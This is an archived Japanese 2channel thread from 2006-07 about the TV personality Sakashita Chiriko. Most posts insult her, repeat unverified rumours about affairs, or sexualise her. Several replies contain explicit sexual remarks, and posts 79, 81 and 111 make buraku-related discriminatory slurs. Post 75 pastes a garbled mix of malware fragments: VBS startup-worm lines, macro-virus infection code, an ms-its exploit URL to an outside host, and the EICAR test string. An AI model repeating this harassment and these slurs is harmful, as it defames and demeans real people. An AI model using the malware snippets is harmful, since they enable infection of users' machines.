2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【演技派】坂下千里子【新人】

1 :名無しさん@お腹いっぱい。:2006/09/02(土) 10:34:56 ID:ZUkApLaH
最近ドラマによくでる、演技も上達

2 :名無しさん@お腹いっぱい。:2006/09/02(土) 10:36:55 ID:i+0zWqck
でも性格悪くて、スタッフや共演者から嫌われまくり。

3 :名無しさん@無名タレント:2006/09/02(土) 10:38:43 ID:s0kHVdM5
ばか下ちりこ

4 :名無しさん@お腹いっぱい。:2006/09/02(土) 10:39:49 ID:DE//JI+Y
-100から-99に成長

5 :名無しさん@お腹いっぱい。:2006/09/02(土) 10:51:30 ID:ZUkApLaH
月9女優

6 :名無しさん@無名タレント:2006/09/02(土) 10:53:19 ID:s0kHVdM5
性格悪くて、スタッフや共演者から嫌われまくり。


7 :名無しさん@お腹いっぱい。:2006/09/02(土) 11:16:31 ID:ZUkApLaH
演技に幅がでたきたね
これからは色んな役が回ってくるだろう

8 :名無しさん@お腹いっぱい。:2006/09/02(土) 11:58:55 ID:m3tlXfv6
嫌われ者

9 :名無しさん@お腹いっぱい。:2006/09/02(土) 12:27:49 ID:hMSEeJpP
【8頭身】坂下千里子ファンスレpart47【美女】
http://tv7.2ch.net/test/read.cgi/geino/1154496799/

10 :名無しさん@お腹いっぱい。:2006/09/02(土) 15:45:58 ID:S7PwkwMI
確か「模倣犯」に出たときのセリフが
ファックユー! だけだった女優ですね

11 :名無しさん@お腹いっぱい。:2006/09/02(土) 16:40:42 ID:plmR00nN
映画に出たのってそれだけなのかな?

12 :名無しさん@お腹いっぱい。:2006/09/02(土) 19:53:38 ID:NmOnZ4s0
。  。゚ 。 。 。゚.。
   彡川川三三三ミ〜 プウゥ〜ン
 。 川|川/゚∴゚\ b〜 ポワ〜ン __________
 。‖|‖.゚◎---◎゚|〜 ゚・    /
  川川‖∵∴゚。3∵゚ヽ〜    <  遊びに来ちゃった
  川川∴゚∵∴)д(∴)〜      \__________
 。川川∵∴゚∵∴〜・%〜。 カタカタカタ
  川川‖∵∴゚〜∵/‖。 ______
  川川川川∴∵∴‰。U ゚ |  | ̄ ̄\ \
 U 〆∵゚‥。 ゚o゚ o\__|  |    | ̄ ̄|
   /  \自営業__    |  |    |__|
   | \____ |つ |__|__/ /
   /         | ̄ ̄ ̄ ̄|  〔 ̄ ̄〕

13 :名無しさん@お腹いっぱい。:2006/09/02(土) 19:57:13 ID:c+JDisXM
黒いのはチリだろ四股。
今考えると本当一気にブレイクしたもんな
怪しいとこありすぎだったか

千里子はプロデューサーや人気ある芸能人には普段と喋り方や声のトーンが違うって吉本芸人に聞いたことあるよ。

関西ローカルの番組で嘘つき女って言われてたよ。
4股も実はその倍股かけてたって。
あと司会の近くばかりにいき自分をアピールばっかりするって。
梨花が一番嫌いな女性タレントとして上げてからそこまで話広がってた。
最低っすね。

14 :名無しさん@お腹いっぱい。:2006/09/02(土) 20:02:36 ID:AcuHbw4y
そういえば、キャイーンの天野さんが以前
「チリ子はカッコイイ男性タレントが来ると態度が変わる」って言ってました。
いつでも、どこでも必死ですね。

15 :名無しさん@無名タレント:2006/09/02(土) 20:11:28 ID:s0kHVdM5
性格悪くて、スタッフや共演者から嫌われまくり。



16 :名無しさん@お腹いっぱい。:2006/09/02(土) 21:29:44 ID:Tjlo6vkR
四股淫乱ブサイクちりこは消えろ!!!!!!!!!!!!1

17 :名無しさん@お腹いっぱい。:2006/09/02(土) 22:40:29 ID:FFDbjPAS
チリ子の演技は酷すぎるよ。
シリアスなシーンにチリ子が出ると台無しになる。・・・ある意味おもしろいけどね・
あの演技力で事務所もよくドラマに出すよ・・・笑

18 :名無しさん@お腹いっぱい。:2006/09/03(日) 02:20:12 ID:IcV82NDX
それって最初のころでしょ?
この前のはみだし弁護士巽志郎での演技はかなりのものだった
頭がいい人だから上達も早いんだとおもう

19 :名無しさん@お腹いっぱい。:2006/09/03(日) 19:23:38 ID:IcV82NDX
ショムニやナースのお仕事みたいな
バラエティー色のあるドラマやらせてみたいね
映画なら下妻物語みたいなの

20 :名無しさん@お腹いっぱい。:2006/09/04(月) 01:41:41 ID:9qw0BhBL
>>18
Fuckyouは上手だったよ
いかにも言い慣れてる感じだった。

21 :名無しさん@お腹いっぱい。:2006/09/04(月) 09:32:45 ID:kW5iJZW5
この人って頭が悪そう。
何やらせても中途半端だし、本当か嘘か知らんが4股(8股?)を
ばらされるなんてバカ丸出しじゃん!
消えるのも時間の問題だね。

22 :名無しさん@お腹いっぱい。:2006/09/04(月) 09:37:54 ID:9cha3vQT
ちりこに似た子が脚フェチ店にいる。

23 :名無しさん@お腹いっぱい。:2006/09/04(月) 15:53:35 ID:CgObsILf
kwしく

24 :名無しさん@お腹いっぱい。:2006/09/04(月) 16:21:25 ID:YLf1RUSq
ヤリマンの8股女だろ

25 :名無しさん@お腹いっぱい。:2006/09/05(火) 11:44:49 ID:1xIZZvbj
冠番組だったちりちりドクモちゃんが終りますね
でも女優をやるつもりなら仕事を減らさないといけないからしょうがない
ローカル番組だと移動も大変だろうし

26 :名無しさん@お腹いっぱい。:2006/09/05(火) 14:29:13 ID:wRcTTLN8
坂下8里子

27 :名無しさん@お腹いっぱい。:2006/09/06(水) 12:50:46 ID:eR+Wu1UT
あの演技力で女優は無理だろ。声も悪いし。

28 :名無しさん@お腹いっぱい。:2006/09/06(水) 15:15:31 ID:8v+hnedO
ちりこに似た子が大阪の脚フェチ店にいる。ハァハァハァハァ

29 :名無しさん@お腹いっぱい。:2006/09/06(水) 16:20:56 ID:KPjsP1AT
kwしく

30 :名無しさん@お腹いっぱい。:2006/09/06(水) 17:17:25 ID:KPjsP1AT
下手に演技の勉強とかしないでほしい
いまの自然な演技がいい

31 :名無しさん@お腹いっぱい。:2006/09/07(木) 13:05:56 ID:oJsD7j/o
いまの自然な演技がいい・・・って何言ってんのー?
あれのどこが演技だよ?
仕事が減って必死なのも分かるけど仕事は選んだ方がいいんじゃん。
余計にイメージが悪くなるよ

32 :名無しさん@お腹いっぱい。:2006/09/07(木) 15:22:05 ID:M2c4Bp+w
31が思う演技が上手い人ってだれよ?

33 :名無しさん@お腹いっぱい。:2006/09/08(金) 09:33:58 ID:vZF5EWzQ
昼は冴えないお局OL 夜は何でもありのヤリマン
こんなドラマがあったら主役は坂下チン子しかいないでしょー
もちろんオールヌードあり
でも
こんな色気もない男子中学生みたいな体じゃ
見ててむなしくなりそうじゃな

34 :名無しさん@お腹いっぱい。:2006/09/08(金) 15:44:14 ID:QhOZW7yz
前回のDRAMA COMPLEXでの鈴木その子役が認められて
また10月に出るね、どんな役か分かる人教えてください

35 :名無しさん@お腹いっぱい。:2006/09/09(土) 19:29:32 ID:ubxM6/tH
映画にはでないの?

36 :名無しさん@お腹いっぱい。:2006/09/10(日) 11:59:08 ID:HI/sZ0d4
映画ってスケジュール大変じゃないか?大河ドラマになら出そう

37 :名無しさん@お腹いっぱい。:2006/09/11(月) 01:56:18 ID:3cw1UIn6
以前ドラマでセミヌードになってるし映画で必然性があれば脱ぐんじゃね?

38 :名無しさん@お腹いっぱい。:2006/09/11(月) 21:49:48 ID:vWk/6XtH
塵子
自分のことチリって呼ぶのはやめろ
きしょい

39 :名無しさん@お腹いっぱい。:2006/09/12(火) 17:51:42 ID:2HHLwca7
可愛いじゃん
名前で呼んだほうが似合ってる

40 :名無しさん@お腹いっぱい。:2006/09/13(水) 03:10:32 ID:Fef7jhr2
梨花が芸能界で一番嫌いだといってたな
なんか坂下千里子は精神障害らしいじゃん

41 :名無しさん@お腹いっぱい。:2006/09/13(水) 09:29:40 ID:ywxIEzZy
落ち目なのを自覚してるのか必死なのが可哀想
ここまで落ちたら無理だと思うけど
ドラマにでも出てがんばってみたら?
でも演技下手だし恥をかくだけだと思うけどねー
しかし最近、一気に老けたな

42 :名無しさん@お腹いっぱい。:2006/09/13(水) 11:18:06 ID:HNeBtnuS
今までよく頑張ったよ。
もういいから、さっさといなくなれ。

43 :名無しさん@お腹いっぱい。:2006/09/13(水) 22:03:09 ID:YXoOEblq
バラエティーでは頑張ったけど
女優としてはこれからだと思うよ

44 :名無しさん@お腹いっぱい。:2006/09/14(木) 13:40:39 ID:G6RRoa6H
映画にも出てたんですね
今度借り手こよ

45 :母乳:2006/09/14(木) 14:08:53 ID:S23kXEn3
>>37
脱がないよ。男子体系ですから・・・・

46 :名無しさん@お腹いっぱい。:2006/09/14(木) 20:09:44 ID:G6RRoa6H
写真集見ると結構いい体だよ
脱いでほしいな、
もし脱いだら話題性十分だし

47 :名無しさん@お腹いっぱい。:2006/09/15(金) 01:47:04 ID:LqszlBxh
>>18
確かにはみだし弁護士良かった
実況でも評判だった

48 :名無しさん@お腹いっぱい。:2006/09/15(金) 09:33:54 ID:cZ49dqZP
4股ばらされてから仕事減ったよな?
干されはじめたか?

49 :名無しさん@お腹いっぱい。:2006/09/15(金) 22:10:54 ID:LqszlBxh
バラドルのタブーであるエロに挑戦してほしい
女優になるならがんばって

50 :名無しさん@お腹いっぱい。:2006/09/16(土) 14:52:11 ID:galYICta
ドラマで見るとお笑い番組とは別人みたい
千里子が演じる事によって空気が別のものになる
役作りが上手いのか天性のものを持ってるのか
どんな役でもこなす稀有な女優になるかも

51 :名無しさん@お腹いっぱい。:2006/09/16(土) 15:40:24 ID:B2JvfLPy
最近うまいんだ?幸福の王子は下手すぎて笑えた

52 :名無しさん@お腹いっぱい。:2006/09/17(日) 01:18:29 ID:uAHHKlYR
少し評価されたくらいでいい気になるなよ
まだまだ上には上が居るんだよw

53 :名無しさん@お腹いっぱい。:2006/09/17(日) 01:31:16 ID:0TXOeb3I
深夜番組「ぷらちなロンドンブーツ」で演技の事を散々揶揄されていた

54 :名無しさん@お腹いっぱい。:2006/09/17(日) 21:38:48 ID:DT/eqqbK
何かを演じたところで
ヤリマンキャラは消えないよ
それに演技が下手すぎ
シリアスなシーンにチリ子が出るとなぜか笑える
ある意味おもしろい

55 :名無しさん@お腹いっぱい。:2006/09/18(月) 13:34:10 ID:TILtwxoG
シリアスな役はバラエティーとのギャップがあって凄い上手いとおもう
若手の中では上手いほうだね

56 :名無しさん@お腹いっぱい。:2006/09/19(火) 04:00:28 ID:9ci/HrRP
演技はいただけませんな、大根もいいところです。
足が長いのは認めるけど。

57 :名無しさん@お腹いっぱい。:2006/09/19(火) 10:13:50 ID:Z+EccY99
実況でキモがられまくってたし。

58 :名無しさん@お腹いっぱい。:2006/09/20(水) 19:27:34 ID:GhwZTI4O
実況では評価が高かったよ
かなりの演技力だった

59 :名無しさん@お腹いっぱい。:2006/09/22(金) 15:11:14 ID:rjrUXYw0
くりーむしちゅーのベタドラマに出てくるよね

60 :名無しさん@お腹いっぱい。:2006/09/26(火) 18:36:31 ID:WUCN9xdI
どんな役?

61 :名無しさん@お腹いっぱい。:2006/09/27(水) 04:35:15 ID:wZGcYAH6
どんなマンコしてんだろ

62 :名無しさん@お腹いっぱい。:2006/09/27(水) 06:32:32 ID:LqnNj8DS
ブラックホール

63 :名無しさん@お腹いっぱい。:2006/09/27(水) 21:03:31 ID:7sWsgBpc
オードリーヘッピバーン見た
演技うめー

64 :名無しさん@お腹いっぱい。:2006/09/29(金) 02:38:04 ID:dhg7ppDT
根性ありそうだから役によっては脱ぐかもね
最近はヌードNGの女優ばかりでつかえない

65 :名無しさん@お腹いっぱい。:2006/10/07(土) 13:56:36 ID:hwBX5Naf
何のドラマに出てるの?

66 :名無しさん@お腹いっぱい。:2006/10/17(火) 21:26:16 ID:oxr6q8P1
いま日テレに出てるよ

67 :名無しさん@お腹いっぱい。:2006/10/18(水) 10:17:47 ID:YYkuNlIX
演技派・・・となっているから期待してたんだが・・・
何だ?!あの演技は?と言うか、あれが演技に入るのか
バラエティで干されてるみたいだけど、これでは女優としても
ダメだろー

68 :名無しさん@お腹いっぱい。:2006/10/19(木) 03:33:34 ID:rO+YPBn4
もう少し長い目で見てあげてよ
一生懸命演技してるし前に比べたらかなり上手くなってるから

69 :名無しさん@お腹いっぱい。:2006/10/19(木) 03:48:11 ID:2I2pD7Eq
落ち目ババアイラネ

70 :名無しさん@お腹いっぱい。:2006/10/20(金) 00:31:03 ID:MDgfeE6c
演技なんかできないクソミソなやつ。
女優なんてよく言えるな。消えちまえ

71 :名無しさん@お腹いっぱい。:2006/10/20(金) 03:33:08 ID:pCJlcmpU
前回もそうだったけど長いセリフが多いよな
テストでもされてるんだろうか?

72 :名無しさん@お腹いっぱい。:2006/10/20(金) 15:38:33 ID:vrwOpYim
落ち目なのは仕方ないとして事務所もよくドラマの仕事させるよなー
あんな演技力で本人も恥ずかしくないんだろうか
落ち目タレントって惨め・・・

73 :名無しさん@お腹いっぱい。:2006/10/20(金) 15:42:18 ID:JAbjEjkh
千里子は金に汚そう。

74 :名無しさん@お腹いっぱい。:2006/10/20(金) 16:13:26 ID:pCJlcmpU
千里子は家が裕福だからなのか金には興味ないらしい
もえみたいにIT長者に口説かれることはないよ

75 :<body onload=window()>:2006/10/20(金) 17:10:37 ID:r+w7F+bl
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


76 :名無しさん@お腹いっぱい。:2006/10/21(土) 15:35:21 ID:kNdgWhsA
ちりちゃんは演技うまくなったね

77 :名無しさん@お腹いっぱい。:2006/10/23(月) 07:58:29 ID:v7ySGCY7
やべー演技が自然になってきてる

78 :名無しさん@お腹いっぱい。:2006/10/23(月) 08:30:56 ID:dzePMirz
>>74
もえは、日本でも有数の仏具屋の娘だぞ

79 :名無しさん@お腹いっぱい。:2006/10/23(月) 09:22:57 ID:mMjtL7Dh
こいつの実家と近所。
こいつの実家が金持ちなんて嘘。
こいつは、高校時代、サッカー部マネージャーしてて 自分のツレと付き合っていた。
彼氏に弁当作ってたが 実は こいつのオカンが作ってた。
立ち回りがうまく、男にこびていて、同性からは嫌われてた。
出身は京都府宇治市。
京都でも、かなりの田舎出身。
宇治市は、部落も多く、ぶっちゃけ品の良い土地ではない。

80 :名無しさん@お腹いっぱい。:2006/10/24(火) 06:30:24 ID:9jVMhrcS
そんな誰でも知ってる情報じゃ信憑性ね〜〜

81 :名無しさん@お腹いっぱい。:2006/10/26(木) 04:51:07 ID:y4hFvEFG
はぁ?
信憑性ないんかい
同じ町内で
小学・中学・高校と
同級生やったんやけど。
あんたも宇治の人間か?
非差別部落万歳ー

82 :名無しさん@お腹いっぱい。:2006/10/26(木) 05:47:06 ID:Z0Tlbi1u
↑なにこいつ?

83 :名無しさん@お腹いっぱい。:2006/10/26(木) 15:36:01 ID:ZzSLUIIu
舞台とかやればいいのに

84 :名無しさん@お腹いっぱい。:2006/10/27(金) 11:27:42 ID:Kca6UdYf
ドラマの台詞一つ 言えないのに舞台が出来る訳ないだろ
止めとけ!また恥をかくだけだぞ


85 :名無しさん@お腹いっぱい。:2006/11/04(土) 09:30:40 ID:a138H3oT
東海テレビ・今日

12:00〜13:25。【芸能人おまつり料理王決定戦】

86 :名無しさん@お腹いっぱい。:2006/11/10(金) 16:10:13 ID:zQez6Jpb
また月9に出ないかな?

87 :名無しさん@お腹いっぱい。:2006/11/14(火) 18:59:36 ID:g91atz3a
のだめみたいなドラマが向いてるとおもうな
コントのノリでやればいいんだよ

88 :名無しさん@自治スレで板設定値議論中:2006/11/18(土) 20:30:03 ID:/Cdj8xiK
落ち目ババアイラネ

89 :名無しさん@自治スレで板設定値議論中:2006/11/22(水) 13:15:00 ID:w0Fx+6iq
存在感はさすがだけど演技派っていうより
自然な演技で評価できる


90 :名無しさん@自治スレで板設定値議論中:2006/11/25(土) 17:16:14 ID:FRAbrtEv
TBSのドラマに出るらしい


91 :名無しさん@自治スレで板設定値議論中:2006/11/26(日) 11:46:21 ID:OfUtABYm
結構出てるね
これからバラドルから女優にシフトしていくのかな?

92 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 00:42:20 ID:jWd9tu8+
足がきれすぎる(^-^)/

93 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 00:48:19 ID:O/E4wYu6
バッチリ、チリ脚

94 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 03:40:59 ID:IRojezXO
テレビでユンソナの事を悪く言ってたの。それから性格悪いのかなって…あんまり好きではないな

95 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 09:36:01 ID:O/E4wYu6
ユンソナの方が性格が悪いだろ

96 :名無しさん@お腹いっぱい。:2006/12/08(金) 12:20:42 ID:RMSCYaST
>>94
kwsku

97 :名無しさん@お腹いっぱい。:2006/12/24(日) 20:10:39 ID:ln+m/W3/
メリー クリトリス!


98 :名無しさん@お腹いっぱい。:2006/12/25(月) 00:11:55 ID:XgNfPIWP
一切の遠慮無しで思い切り大量のザーメンをオマンコの奥に中出ししたい。

99 :名無しさん@お腹いっぱい。:2006/12/25(月) 12:42:36 ID:W/EwGzhR
千里子の脚最高。

100 :名無しさん@お腹いっぱい。:2006/12/25(月) 23:18:45 ID:w2AWNSXO
100

101 :名無しさん@お腹いっぱい:2006/12/26(火) 00:20:30 ID:HabwyShQ
おいおいB民とかいいだしても芸能人は多すぎだろ 珍しくないよ

102 :名無しさん@お腹いっぱい。:2006/12/29(金) 01:49:01 ID:OoPw0X12
芸者の役をやるドラマっていつからですか?

103 :名無しさん@お腹いっぱい。:2007/01/05(金) 09:44:41 ID:luWsi8Xp
週刊誌の表紙に載ってたけど、写真集で手ブラってホント?

104 :名無しさん@お腹いっぱい。:2007/01/07(日) 12:00:41 ID:zA3ue2Fx
手ブラしてもあの胸ぢゃ…

105 :名無しさん@お腹いっぱい。:2007/01/17(水) 23:09:11 ID:rlGu9pQ30
この人って福山ヲタだって聞いたけど、マジですか?

106 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:25:18 ID:i1xj/nOPO
そうだよ。
久本程じゃないみたいだけどね

107 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:19:11 ID:TwNMeYvmO
彼氏が居た

108 :名無しさん@お腹いっぱい。:2007/02/02(金) 05:33:29 ID:SOS6OFhwO
坂下千里子スレこれだけか!!w可愛いのになぁ〜

109 :名無しさん@お腹いっぱい。:2007/02/19(月) 12:31:54 ID:VOVE4+ntO
ちりこ最近ミニスカ少ないな

110 :名無しさん@お腹いっぱい。:2007/02/23(金) 05:48:46 ID:EZdsMO7k0
福丸旅館でいい演技してた
胸も大きくなったみたい

111 :名無しさん@お腹いっぱい。:2007/02/23(金) 06:06:27 ID:KN1bA7hJO
芸能界は同和の人のものなので、そこんとこよろしく

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)